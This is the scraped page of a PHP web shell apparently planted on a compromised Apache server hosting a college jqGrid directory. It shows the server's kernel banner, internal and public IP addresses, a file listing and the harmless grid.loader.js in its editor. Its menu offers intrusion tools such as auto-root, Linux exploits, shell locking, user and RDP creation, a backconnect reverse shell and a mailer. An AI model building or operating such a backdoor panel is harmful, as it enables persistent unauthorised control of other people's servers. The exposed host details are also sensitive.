Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.188.152
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
college /
JQGrid4.4 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
JsonXml.js
9.26
KB
-rwxr-xr-x
grid.base.js
123.31
KB
-rwxr-xr-x
grid.celledit.js
18.02
KB
-rwxr-xr-x
grid.common.js
23.9
KB
-rwxr-xr-x
grid.custom.js
27.78
KB
-rwxr-xr-x
grid.filter.js
23.1
KB
-rwxr-xr-x
grid.formedit.js
83.26
KB
-rwxr-xr-x
grid.grouping.js
13.55
KB
-rwxr-xr-x
grid.import.js
9.17
KB
-rwxr-xr-x
grid.inlinedit.js
21.03
KB
-rwxr-xr-x
grid.jqueryui.js
18.08
KB
-rwxr-xr-x
grid.loader.js
2.35
KB
-rwxr-xr-x
grid.subgrid.js
10.23
KB
-rwxr-xr-x
grid.tbltogrid.js
3.16
KB
-rwxr-xr-x
grid.treegrid.js
21.89
KB
-rwxr-xr-x
jqDnR.js
2.02
KB
-rwxr-xr-x
jqModal.js
3.41
KB
-rwxr-xr-x
jquery.fmatter.js
22.74
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : grid.loader.js
//This file should be used if you want to debug and develop function jqGridInclude() { var pathtojsfiles = "../JQGrid4.4/src/"; // need to be ajusted // set include to false if you do not want some modules to be included var modules = [ { include: true, incfile: "i18n/grid.locale-en.js" }, // jqGrid translation { include: true, incfile: "grid.base.js" }, // jqGrid base { include: true, incfile: "grid.common.js" }, // jqGrid common for editing { include: true, incfile: "grid.formedit.js" }, // jqGrid Form editing { include: true, incfile: "grid.inlinedit.js" }, // jqGrid inline editing { include: true, incfile: "grid.celledit.js" }, // jqGrid cell editing { include: true, incfile: "grid.subgrid.js" }, //jqGrid subgrid { include: true, incfile: "grid.treegrid.js" }, //jqGrid treegrid { include: true, incfile: "grid.grouping.js" }, //jqGrid grouping { include: true, incfile: "grid.custom.js" }, //jqGrid custom { include: true, incfile: "grid.tbltogrid.js" }, //jqGrid table to grid { include: true, incfile: "grid.import.js" }, //jqGrid import { include: true, incfile: "jquery.fmatter.js" }, //jqGrid formater { include: true, incfile: "JsonXml.js" }, //xmljson utils { include: true, incfile: "grid.jqueryui.js" }, //jQuery UI utils { include: true, incfile: "grid.filter.js" }, // filter Plugin ]; var filename; for (var i = 0; i < modules.length; i++) { if (modules[i].include === true) { filename = pathtojsfiles + modules[i].incfile; if (jQuery.browser.safari) { jQuery.ajax({ url: filename, dataType: "script", async: false, cache: true, }); } else { if (jQuery.browser.msie) { document.write( '<script charset="utf-8" type="text/javascript" src="' + filename + '"></script>' ); } else { IncludeJavaScript(filename); } } } } function IncludeJavaScript(jsFile) { var oHead = document.getElementsByTagName("head")[0]; var oScript = document.createElement("script"); oScript.setAttribute("type", "text/javascript"); oScript.setAttribute("language", "javascript"); oScript.setAttribute("src", jsFile); oHead.appendChild(oScript); } } jqGridInclude();
Close